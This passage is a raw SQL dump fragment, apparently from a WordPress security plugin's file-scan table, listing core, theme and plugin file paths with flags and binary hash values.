\"�L���','',0,'?'),('Q����������','wp-content/themes/newsmag/assets/vendors/machothemes/components/searchform.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t{��4��=�{����','I���2�����6=�,�N����`��qK�4','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bv�J�Y|���O[k��','R\r��½]����(%^V�z �hSG�LSO�','',0,'?'),('Q� `�7������%�','wp-content/themes/sg-window/inc/css/image.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���}.����q�','&��A�C~v�\Z��!�jK����&z�5u8�','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q��nyI����`��\rR','wp-content/themes/skt-pathway/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����CbA�A���k','�3��2Xh��.����X\\����8_�l�u�e�','',0,'?'),('Q�Y�Qf�7�@2xC','wp-content/themes/twentynineteen/images/pattern_02.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߢБ^N\0�[1#U','OH[�Byj��[�#��A縬8Ė�_7 r�','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ��q�.�\rl4G�','�˾�6�/(���OE||\'�郊�$emԬ!�','',0,'?'),('Q���,ǩ<)�>i;M��','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϠX�9K$�fҦ�ϡ','�*��ܖ���,m%����i�[�\"��Ý�C�!','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ur�|,:]�_��#','d\0��\\w�| ��w��W?�3 gYaX~]�-�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi �սq','',0,'?'),('Rb{����*͆�(��','wp-content/themes/advance/inc/kirki/includes/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^:�NU{x�\n�n���I','�a[a4����\r�8p�Cy\Z8�{�JΫX����','',0,'?'),('R�)/��7iY�7���','wp-content/themes/pine/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/+�o�1=�^���','/I��}�\rbI��hFi%r9I����3�Ř�','',0,'?'),('R.�v�dc�8~\\SI��','wp-content/themes/hueman/assets/front/img/demo/6-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���%�-(�$!�','7WQkѩ(y�(YltӃ�Yxp5ңӈ&A��','',0,'?'),('R1ȏ\ny�o.�i�','wp-content/themes/promote/inc/kirki/includes/lib/class-kirki-color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&q<���x�����vb�','��e|�TtĀk21�7��d�mr����Oꥆ�','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('R=�چ���E�EL��','wp-content/themes/pine/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U`I|�v��T�B:�r�','�>�B���i����_�R���KE_@','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�^�p9Y\\\re*.�2',',/;�{�M,��z���+��o{�c�|u��b\"_Q','',0,'?'),('Ra��ce��JT�','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3I�w>��A�\n�','������F��\0O�.Qm+v�Hj�E�odFX�','',0,'?'),('Ra���#��֒���','wp-content/themes/promote/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#2���\rm��ܘ%b','L���rw8�c6���`���M��0$R�y��','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0\rJ`X�\"8�by','oHi��Y�N3 >����_����J�,���S^','',0,'?'),('Rmj���\\X����ָQ�','wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('R��/��ޢ2\r�Boƣq','wp-content/themes/travel-stories/font/Lora-Regular/lora-regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t��o�l�9�?��\'�','.�w�K��2ef��k�E��d_pA��','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nv�>4��~,�aڛ858','�\ZKok����ӗi0˓���RI��c\0�Oh','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L����S�0���','S[��n��+��C�w�C�쌑�)n�d','',0,'?'),('R�1�?Rh���G�qq','wp-content/themes/promote/inc/kirki/includes/class-kirki-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WO�}+��*(�a�aG�','H��im��g�\\��/#��-��.桽��M0�-�','',0,'?'),('R�/?W��ގ״}','wp-content/themes/travel-stories/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�n�h�S�ф~mq�1','�y}�)�,��Z��8�m#�V�r֍8','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('R¥�����Le�q �&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Za�K�=���l�s�','�>�n�\"S����q��t�\"qz��ي�*pZ#�+x','',0,'?'),('R���a����#ڵ','wp-content/themes/showcase-lite/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���� I���-\'\r�Ԗ','�qY+elС��\Z_H*\nsH �n\rT�j��RT','',0,'?'),('R��%��G�z��ov','wp-content/themes/hueman/assets/front/img/header/default-header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+Ny�Ek�ɓ�T��','�1w\nϸQ2\\� }֪��r\\䁴�+��]�','',0,'?'),('Rщ�j�#D��(��@�','wp-content/themes/advance/images/big-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\RZD1�K�1�\n��','�`G�\n���ӜXө�]��g�5 n8`�\\B\\$}�','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('R�@9$8�>��5','wp-content/themes/newsmag/inc/widgets/posts_grid/layouts/posts_grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��@DO\"I1a\nvB5p','R�(>w#�7\n�}�WS�R�O��w5','',0,'?'),('R��ڦ����r��O)Fu','wp-content/themes/hueman/assets/front/img/demo/10-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z%i��\0�dS��N','�܍ T�P�R0�Be�ޝj�W8�]�#�$��','',0,'?'),('S�T��ʝI�o��x!','wp-includes/wp-includes/class-wp-term.php',0,'��Q5��ׄXZ��','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('S\"h���y�؍�l�I�','wp-content/themes/newsmag/assets/images/grey.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��E�+R W�PYi��','���*�3I#yc~Ҥ���I��� v�k���z','',0,'?'),('S#A��c]����z\'�','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',0,'�V�̦���QK�#','�V�̦���QK�#','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�m���\n8�� �','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SDνy��P�d.���','wp-includes/wp-includes/SimplePie/Copyright.php',0,'k��>�����ԪQ','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('S`{_�~?+�ߵ�{�','wp-includes/wp-includes/class-wp-network.php',0,'�ZM�ٟ�:�l\"pdΛ�','�ZM�ٟ�:�l\"pdΛ�','�%q2���Ӑ�F���JȑR~҃i���`;�>�','',0,'?'),('Sb��R����ϕ�m�b','wp-includes/wp-includes/PHPMailer/SMTP.php',0,'�,k�)����X','�,k�)����X','��>��|F��j�e�<;E�Tr�ۭe��wO','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��gRȺ#c�٩�','���?~�o,cy2�P��on��`����ϻ}u8:H','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\E���(��i','4�O���+o�c.`_����U��>�8��','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S�`:}��!S`���\'�7','wp-content/themes/hueman/functions/admin/class-admin-update-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\n6��F(Đ.�C','�`T�s��b��T\r[�����pz��-P�\n','',0,'?'),('S����K^c~�','wp-content/themes/sg-window/img/icons/small/aim.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�|���6��','�M�y��V��G�ó���|O+���@� K','',0,'?'),('S�_��@8Q�̞�����','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js',0,'�-\\�d��oG��\n��2','�-\\�d��oG��\n��2','Sa)����ʗn&B��V�~��11�\'w�(','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IF �1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S���b�xt����wwh','wp-content/themes/storeone/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ިUPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('S�MȞ�\n[�l�','wp-content/themes/gambit/inc/widgets/widget-magazine-posts-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���b��ְ�����','��tdE!���N�9IH�Z*E��i��y����G','',0,'?'),('Sǿ��~�ڐ�eoȸj','wp-content/themes/anima/resources/images/demo/2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hD�~��[*SK�o.N','(n�K�uڞ��:[��yI\0R�e�#�~�B�L','',0,'?'),('S�݅*�IE4a��O','wp-content/themes/anima/includes/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�<�:��n�q�ķN','.��sbr07a�)3qo��`\Z��C:YcI���','',0,'?'),('S����5BUY���l','wp-content/themes/advance/inc/kirki/assets/scss/controls/multicolor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UGf\\R��ZG','T�\'�nd���5���:f��65Tj�_|�$��S','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('S�b�.�:n_o��\"s��','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŵ���f�#!��N1','僉k�Y�(�O(��N\'=X֘�B��x5�','',0,'?'),('S�r([~T<�ρa���','wp-includes/wp-includes/js/tinymce/plugins/colorpicker/plugin.js',0,' C��ȭ?d�{V��',' C��ȭ?d�{V��','���B��R�\0�!�䄚����Q�����\'5w','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��4�G��FdW(�','1��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('S��0ӽ\nq����\n�5','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T!���ǷCee��R','wp-includes/wp-includes/js/dist/autop.js',0,'߭Φ� ��$=\Z��','߭Φ� ��$=\Z��','��-�����ي�&%����~.+oVr�,>꾥W','',0,'?'),('T!��+�g�r�w��76','wp-content/themes/sg-window/genericons/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('T+�BK��n�T�>C�','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Do��M��fd��~','Z�`K E�A���\\�|�*e�Ҍe�?���1n�','',0,'?'),('T.�փFmK[���t','wp-content/themes/sg-window/inc/widget-tags-naigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6?���C��<0X��K��','Ӑp[�M��A�>�gd�Wm�1,�{\0Q�','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T;�r�UP.���]��i','wp-includes/wp-includes/images/admin-bar-sprite.png',0,'S���:�W���^','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('T?�?:qP��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('T?�:��r�ǼohmKCr','wp-content/themes/advance/css/customcss/body_layout.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�֬/��\\���4^�','kLz�{ B:��n2��u03�����(���Ak8Y','',0,'?'),('T?��MJԔx��','wp-content/themes/newsmag/assets/vendors/machothemes/components/gotop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xm�p���\\u*E','�Q�|2�ԧ�kmf�ԲW��_-C�ݎ�^�\0','',0,'?'),('TL�`��xX �l���','wp-includes/wp-includes/images/smilies/icon_eek.gif',0,'�/I ���x�)�(\"��','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('TP�K��\Z�筴\"=M�','wp-content/themes/maxbusiness/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�MiF��6����z9vҮ','��h_�!d�r�e�U\\5��΅\'�����y�!','',0,'?'),('Te�\Z���¸M��,�','wp-includes/wp-includes/js/tinymce/themes/inlite/theme.js',0,'4O��DIc`��EJ','4O��DIc`��EJ','p�v�T5Z>j��j�\0\0��f��xa/g=�&�','',0,'?'),('Tg9���idK���\0��','wp-content/themes/spidermag/template-parts/archives/archive-normal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� �4�ٕ�Lx�ޤ','�gD���[���WT�u����W�Cs�����','',0,'?'),('Tma��>�*\\3�3','wp-content/themes/advance/inc/kirki/assets/js/controls/dropdown-pages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �~|�D�Jt�D�\0x�','����@��L��Y{\"�����:NJ�Dq\"[','',0,'?'),('Tn� @]��rـ9:�t','wp-content/themes/newsmag/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"*�my9��M>~�!�!�','Eɿ\0P���WI$��pw�@P�w�t���UW�y','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����--��T�J�;','��O���w�:�V�^�w�^[\n� L�\'�6@-�\r�','',0,'?'),('Tz\'�$�;��ўU�\\�','wp-content/themes/maxbusiness/template-parts/home-clients.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���{_�6��6rX��','����KT�H$N�������Bү��E','',0,'?'),('T{\'���g,(:~�G','wp-content/themes/twentynineteen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈLBP��En�\\^ ��P','�RSV%�6�){��O����x2��N�A���','',0,'?'),('T{��Qmc��7��0\"s','wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T��ptz3ug�=\\�sF�','wp-includes/wp-includes/sodium_compat/autoload-php7.php',0,'������n��4��','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T���K����oIV�','wp-includes/wp-includes/class-wp-recovery-mode-key-service.php',0,'�9A��l���%<�C','�9A��l���%<�C','����{�Tg�}�E��^�[�Fe�.�','',0,'?'),('T��v�(��k�\"','wp-content/themes/advance/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٰD��S~��|i5��','��\"�\"Eɍ��@��1���Ns��b}��dS�Z�','',0,'?'),('T���z��:8vN\\��','wp-content/themes/hueman/assets/front/js/scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{B4�3g�Յ��5!:\0�','�6�4��˂���l�U�[e�t�5�4���y���','',0,'?'),('T�h�\Z�}ATx���H�','wp-includes/wp-includes/js/backbone.js',0,'\"$2hj32U������','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6� Z�+','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h�� �_��֚����!E��4�\Zv��F��','',0,'?'),('T�HO���۾����=','wp-content/themes/travel-stories/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S7g�q�F~���F͡','�ڀ����y@�=�1��0��\n}��!�����','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U\rԈ�Z�>l���R','wp-includes/wp-includes/SimplePie/Misc.php',0,'��I��\Z��}[�X�rb^','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('U�t]t�A:�ZQ�g�','wp-includes/wp-includes/js/dist/nux.min.js',0,'��G�r�[Ķ��i��k�','��G�r�[Ķ��i��k�','����=cA\"�-3�8��{t-�8 ��h�','',0,'?'),('U\"ou?���Δ��','wp-content/themes/weblog/assets/library/html5shiv/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ިUPb��t�<','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('U*����<�bD�&���','wp-includes/wp-includes/js/dist/vendor/wp-polyfill.min.js',0,'P����$@A.0�Qt','P����$@A.0�Qt','@b�/E�ؔå��;M �ۙZRİ�x����','',0,'?'),('U4-��s\Zj��_��','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_/C�V�z�Y\'�@�.','@b{r�_R�V�cQ�ϓE��N�1���','',0,'?'),('U6�^���#��g�','wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php',0,'@���N o�F\0�A\n','@���N o�F\0�A\n','cUȫd4�B�nD����Q��n+R��J1e','',0,'?'),('UC&c���-��q��','wp-content/themes/gambit/inc/template-tags.php',0,'�Y�u��n�s����','�Y�u��n�s����','e�2�\Z�\Zj��&S��\"��^*��\\p','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�W��P��2oY','�v�����4\'���w��h�<|Z�4Q8�xǃ5','',0,'?'),('UP�������iC','wp-content/themes/spidermag/assets/images/preloader/text.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HQZ�e��`wI�q���','��Oh�]�N��-�u�Tg�%J�@�E\nIz�\'���','',0,'?'),('Ue�tA&�R|��\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�1�`�Uy�+�۟��','�4_�����H1h(�p��A�9u���^�f�B','',0,'?'),('U}�5�VGҘT.]�','wp-content/themes/showcase-lite/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�@\Z���S��Z���','MB�;���#L�i8O��G��g��@','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�my(�[�~��M������N�Ԙ��;i','',0,'?'),('U���+!@��` �b','wp-content/themes/Endolf/bootstrap/bootstrap.min.js',0,'\0H(�[B\r������@�A','\0H(�[B\r������@�A','��=\'~����s8��u�_�[���*>�\n','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('U�@���dO�a�Եv.<','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',0,'Э�bJ������\r%','Э�bJ������\r%','�*��>}6��?j-9�N�AJ|�r���w�d�','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=&#��Tk��A=�?','�S��� `4� :�0�U�h���p���s�ń','',0,'?'),('U�Q�1{�4�/�g��','wp-includes/wp-includes/js/dist/escape-html.min.js',0,'1���~9�(��-{�','1���~9�(��-{�','G�U_�N_xC�`ѳf)�r����s��\Z�\n','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ,� ^��R6Մ��l','�&x{�e5��ɔ�|��c��J��\Z���Ȓ','',0,'?'),('U�y>��k@�(<LK�','wp-includes/wp-includes/sodium_compat/src/Core/Util.php',0,'��w.�n��7��I���','��w.�n��7��I���','����W��.�3$��^�O�:7za��0A�','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('U�^�� H�T�7j','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���Y�p','�����,�\"w�,��L� Rj\0��)M�o�','',0,'?'),('U�*�%���M�%9mה','wp-content/themes/wp-barrister/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E���8%��&4�^�4','�l�?=��qo�\\�t���E�8\0�a�&�N�','',0,'?'),('U�n��ǃ\'�\"g�33','wp-content/themes/capacious/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�i�������O|','-���,]\Z�7���q�L�t����G��Χ','',0,'?'),('U�fR�H��;��+�V�','wp-content/themes/event/inc/front-page/our-speaker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0�y~�����7�8','�2��Xē�A̘(�虹�r���/��ge䕾�','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��r�#��j �','LF�#�53��uu��t�F 